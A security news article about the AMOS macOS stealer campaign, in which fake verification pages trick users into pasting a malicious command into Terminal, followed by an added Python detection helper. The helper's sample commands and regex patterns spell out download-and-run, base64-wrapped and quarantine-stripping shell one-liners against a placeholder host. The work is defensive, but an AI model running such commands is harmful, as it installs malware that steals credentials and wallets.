Валентин Шнайдер (Valentyn Shnaider), Hot News
10 June 2025, 11:26
Russian hackers infect macOS through fake verification
CloudSEK has detected a new attack on macOS users. Attackers, presumably Russian-speaking, are distributing the Atomic macOS Stealer (AMOS), malware that steals passwords, crypto wallets and system data. The attack relies entirely on social engineering: the victim is tricked into running a malicious command in the Terminal by hand.
According to The Hacker News, the attackers built a series of phishing sites that mimic the support pages of a popular provider. When the page opens, the visitor is asked to pass a «bot check». The check is designed to fail, after which the visitor is offered an «alternative» method: the page places a command on the clipboard and instructs the victim to paste it into the Terminal and run it.
This command downloads AMOS, a known macOS stealer that collects credentials, cookies, crypto wallet data, browser autofill data and even screenshots from the device. Researchers found Russian-language comments in the source code of the phishing site, which points to Russian-speaking operators.
A little more about AMOS
AMOS is a macOS infostealer that first appeared in 2023. It is sold on darknet forums as a subscription (malware-as-a-service) and is actively used against crypto traders, journalists and tech workers.
The campaign does not target specific companies or countries: any macOS user can become a victim, especially those who look for technical support or services through a search engine. CloudSEK notes the poor quality of the phishing sites, which contain confusing instructions and interface elements meant for other operating systems, but this does not make the threat any smaller.
What to do:
Never paste a command into the Terminal because a web page told you to, whatever the pretext («verification», «fix», «update»).
Always check the URL before trusting a page that claims to be an official support site.
Install endpoint protection and activity monitoring on your Mac.
Enable two-factor authentication on your accounts.
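The «paste this into Terminal» lure described above leaves a recognisable trace: a one-liner that fetches something from the network and pipes it straight into a shell, often wrapped in base64, with output silenced and the Gatekeeper quarantine flag stripped. As an added example (this is not code from the article, CloudSEK or The Hacker News), the Python helper below scores a command line against such indicators and peels one layer of base64 so that the real command inside is also inspected. The indicator list and the sample commands are constructed for this demonstration; the `example.invalid` URLs are placeholders, not real campaign infrastructure.

```python
"""Triage helper for ClickFix-style Terminal one-liners.

Added example, not from the article. It flags shell command lines that carry
the hallmarks of a fake-CAPTCHA loader: a download piped into a shell,
base64-wrapped payloads, quarantine-flag removal and silenced background
execution. Feed it lines from shell history or from a process-monitoring
tool; nothing here talks to the network.
"""
import base64
import re

# Indicator name -> regex applied to the lower-cased command line.
INDICATORS = {
    # Network fetch whose output is fed straight into an interpreter.
    "fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?((ba|z|da)?sh|osascript|python3?|perl)\b"),
    # base64 -d / -D (BSD spelling) / --decode chained into a shell.
    "base64_decoded_to_shell": re.compile(
        r"base64\s+(-d|--decode)\b[^|;&]*\|\s*(ba|z)?sh\b"),
    # Gatekeeper quarantine attribute stripped from a downloaded file.
    "quarantine_bypass": re.compile(
        r"xattr\s+(-r\s+)?(-d\s+com\.apple\.quarantine|-c)\b"),
    # Output hidden and/or detached so the victim sees nothing happen.
    "silenced_background": re.compile(r"(>\s*/dev/null\s+2>&1|\bnohup\b|\s&\s*$)"),
    # Staging of the fetched file in a temp directory before execution.
    "tmp_staging": re.compile(r"(/tmp/|/private/tmp/|\$tmpdir|/var/folders/)"),
}

# Long runs of base64 alphabet, the usual shape of an embedded payload.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _try_b64(token):
    """Return decoded text if `token` is valid base64 for readable ASCII, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None
    if all(ch.isprintable() or ch in "\n\t" for ch in text):
        return text
    return None


def find_indicators(cmd, depth=0):
    """Return the list of indicator names triggered by `cmd`.

    Indicators found inside a decoded base64 blob are prefixed with
    "decoded:" so the report shows which layer they came from.
    """
    low = cmd.lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(low)]
    if depth < 2:  # unwrap at most two layers of base64
        for token in B64_TOKEN.findall(cmd):
            inner = _try_b64(token)
            if inner is not None:
                hits.append("embedded_base64")
                hits.extend("decoded:" + h for h in find_indicators(inner, depth + 1))
    return hits


def is_suspicious(cmd, threshold=2):
    """A single `curl | sh` is common in legitimate installers; require two signals."""
    return len(set(find_indicators(cmd))) >= threshold


# Constructed samples for the demo. The base64 one is built at runtime so the
# encoding is guaranteed correct; none of these URLs exist.
_INNER = "curl -fsSL https://example.invalid/update.sh | bash"
SAMPLES = {
    "benign_brew": "brew install wget",
    "benign_git": "git clone https://github.com/example/repo.git && cd repo && make",
    "clickfix_plain": "curl -fsSL https://example.invalid/fix.sh | bash >/dev/null 2>&1",
    "clickfix_b64": "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -D | bash",
    "clickfix_staged": ("curl -o /tmp/Update https://example.invalid/Update && "
                        "xattr -c /tmp/Update && chmod +x /tmp/Update && /tmp/Update &"),
}


def triage(samples):
    """Map each sample name to its sorted, de-duplicated indicator set."""
    return {name: sorted(set(find_indicators(cmd))) for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        verdict = "SUSPICIOUS" if is_suspicious(SAMPLES[name]) else "ok"
        print(f"{name:16} {verdict:10} {', '.join(hits) or '-'}")
```

The threshold of two independent signals is deliberate: `curl ... | sh` on its own is how many legitimate tools are installed, but combined with base64 wrapping, `xattr -c` or `>/dev/null 2>&1 &` it matches the lure pattern far more specifically. Because the helper decodes embedded base64 before scoring, the `clickfix_b64` sample is caught even though the word `curl` never appears in the outer command.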
Recently, we reported on how Google’s threat intelligence team discovered a new malware family called LOSTKEYS, which is attributed to a Russian government-backed threat group.